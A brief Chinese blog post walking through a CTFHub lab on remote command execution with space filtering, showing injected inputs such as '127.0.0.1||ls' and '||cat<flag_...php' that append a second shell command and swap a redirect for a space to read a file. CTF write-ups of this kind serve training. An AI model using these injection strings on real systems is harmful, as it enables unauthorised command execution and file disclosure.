ctfhub技能树—RCE—过滤空格

打开靶机

查看页面信息

开始尝试注入

127.0.0.1 || ls

尝试绕过

127.0.0.1||ls

使用cat命令查看flag

127.0.0.11||cat<flag_10872536812766.php

拿到flag

绕过空格过滤方法很多,详情请自行百度搜索

posted @ 2020-03-18 11:27  anweilx  阅读(1789)  评论(0编辑  收藏  举报